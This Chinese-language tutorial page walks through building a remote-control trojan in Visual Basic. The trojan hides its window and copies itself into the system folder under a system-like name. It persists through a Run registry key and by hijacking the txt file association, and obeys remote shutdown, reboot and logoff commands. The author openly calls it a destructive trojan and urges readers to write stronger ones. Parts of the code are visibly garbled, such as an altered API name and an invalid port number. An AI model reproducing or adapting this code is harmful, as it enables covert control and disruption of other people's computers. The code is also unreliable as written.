利用VisualBasic实现木马攻击

2016-02-19 20:15 2 1 收藏

图老师设计创意栏目是一个分享最好最实用的教程的社区,我们拥有最用心的各种教程,今天就给大家分享利用VisualBasic实现木马攻击的教程,热爱PS的朋友们快点看过来吧!

【 tulaoshi.com - 编程语言 】

首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。
  
  接下来我们回来Server窗体模块中,添加如下代码:
  
  ->PrivateSubform_Load()
   WithMe
  .sckServer.LocalPort=88917'本地端口(呵呵!我的生日!)
  .sckServer.Listen'开始监听
   EndWith
  EndSub
  
  '接受客户端的连接请求。
  
  PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
   WithMe
  If.sckServer.StatesckClosedThen.sckServer.Close
  .sckServer.Accept(requestID)
   EndWith
  EndSub->
  下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为Client,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码:
  
  ->PrivateSubform_Load()
   WithMe
  .sckClient.RemoteHost="127.0.0.1"'设置远程IP,本例设为本机。
  .sckClient.RemotePort=88917'远程端口,就为server中的设置一样.
   EndWith
  EndSub
  
  PrivatesubcmdConnect_Click()
   SckClient.Connect
  Endsub->
  至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print“Connetionsuccessful!”来查看。
  
  这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能―――关机,重启,注销。好,开始吧!
  
  在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:
  
  ->PublicDeclareFunctionExitWindowXXXLib"user32"Alias"ExitWindowXXX"(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong
  
  PublicConstEWX_LogoFF=0
  PublicConstEWX_REBOOT=2
  PublicConstEWX_SHUTDOWN=1
  PublicDeclareFunctionClipCursorLib"user32"Alias"ClipCursor"(lpRectAsAny)AsLong
  
  PublicTypeRECT
   LeftAsLong
   TopAsLong
   RightAsLong
   BottomAsLong
  EndType->
  注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。
  
  下面在Client工程的Client窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:
  
  ->PrivateSubcmdExit_Click()
   Me.sckClient.SendData"Exit"
  EndSub
  
  PrivateSubcmdLogoff_Click()
   Me.sckClient.SendData"Logoff"
  EndSub
  
  PrivateSubcmdReboot_Click()
   Me.sckClient.SendData"Reboot"
  EndSub->
  全都是对服务端发出请求。下面转到Server工程中:在Server中添加sckServer的DataArrial事件,接收客户端的请求。
  
  ->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
   DimstrDataAsString
   WithMe
  '接收客户请求的信息
  .sckServer.GetDatastrData
  SelectCasestrData
   Case"Exit"
  '关机
  CallExitWindowXXX(EWX_SHUTDOWN,0)
   Case"Reboot"
  '重启
  CallExitWindowXXX(EWX_REBOOT,0)
   Case"Logoff"
  '注销
   CallExitWindowXXX(EWX_LogoFF,0)
  EndSelect
   EndWith
  
  EndSub->
  好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在Server中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!
  
  回到Server工程中的modApi中加入如下API函数:
  
  ->PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
  
  PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong
  
  PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
  PublicConstREG_BINARY=3
  
  PublicConstREG_SZ=1
  
  PublicConstHKEY_LOCAL_MACHINE=&H80000002
  
  PublicConstHKEY_CLASSES_ROOT=&H80000000->
  写到注册表启动组中的过程。
  
  ->PublicSubStartupGroup()
  
   DimsKeyAsString
   DimresultAsLong
   DimhKeyIDAsLong
   DimsKeyValAsString
  
   sKey="Systrsy"'启动组中的键,找一个与系统文件相近的。
   sKeyVal="C:/windows/system/systrsy.exe"'木马文件的路径,可以用GetSystemDirectory来取得系统路径。
   result=RegOpenKey(HKEY_LOCAL_MACHINE,_
   "Software/Microsoft/Windows/CurrentVersion/Run",hKeyID)
   Ifresult=0Then
  result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
   EndIf
  EndSub->
  好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:
  
  ->PublicSubWriteToTxt()
  
   DimresultAsLong
   DimhKeyIDAsLong
   DimskeyAsString
   DimskeyValAsString
  
   skey="txtfile/shell/open/command"
   skeyVal="C:/windows/system/txtView.exe"
   result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
  
   Ifresult=0Then
  result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
   EndIf
  EndSub->
  肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。
  
  好,回到Server工程的Server窗体的form_Load中,加入如下代码:
  
  ->DimsCurrentPathAsString,sSystemDirAsString
  sCurrentPath=App.Path&"/"&App.EXEName&".exe"
  sSystemDir=“C:/windows/system”
  OnErrorResumeNext
  
   '复制文件成系统目录下的Systrsy.exe
   FileCopysCurrentPath,sSystemDir&"/Systrsy.exe"
  OnErrorResumeNext
  
  复制文件成系统目录下的txtView.exe
  
  FileCopysCurrentPath,sSystemDir&"/txtView.exe"->
  调用
  
  ->CallstartupGroup
  CallWriteToTxt
  
  '判断程序是否下在运行
  
  IfApp.PrevInstanceThen
   '如果已经运行就退出。
  End
  
  EndIf->
  好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河(呵呵!)
  
  注意:
  
  1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突
  
  2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定
  ->

来源:https://www.tulaoshi.com/n/20160219/1623164.html

延伸阅读
使用TCP协议时,如果需要创建一个客户应用程序,就必须识别服务器的名称或IP地址。应用程序的通信端口随时都将仔细监测对方发出的消息,这是系统进行可靠连接的保证。一旦连接发生,任何一方都可以通过SendData发送和接收数据,并借助GetData把自己的数据分离出来。传送数据时,需要先设定客户机的LocalPort属性,服务器则只需要把RemoteHost属性设定为...
前言: 因为本程序是木马程序,所以在介绍之前有一些木马构成的基本知识事先说明,因为下面很多地方会提到这些内容。一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。这里主要对软件部分介绍,它主要有控制端程序、木马程序(后台服务程序)、木马配制程序组成。控制端用以远程控制服务端的程序;木马程序是潜入服务端内...
标签: Web开发
我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉. 在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现. asp木马大家都很熟悉,无非就是...
----在大量的应用软件中,软件启动后一幅画面有几秒的信息显示,列出产品、平台、版本号和版权信息,称之为“启动程序时的闪烁屏幕”。在VisualBasic中是如何实现的呢?本文讨论生成启动屏幕的一种方法,并使之多彩化。做到启动屏幕在桌面停留时,提示文字在桌面上“流动”(如《东方快车》启动画面)。同时也可以实现流动文字的闪烁、变色等效果...
《超级解霸》等VCD播放软件一般都有个按钮或菜单选项,叫做“播放VCD”,单击即可自动播放VCD影片。如果文件路径是固定的,那只用多媒体控件(mmcontrol)即可实现,但对于不同电脑来说,因为硬盘的逻辑分区数量不同,光盘机的路径很可能是不同的。它到底是怎样实现的呢?下面,请看我详细分析: 用“regedit.exe”查看Windows98的注册表...

经验教程

541

收藏

84
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部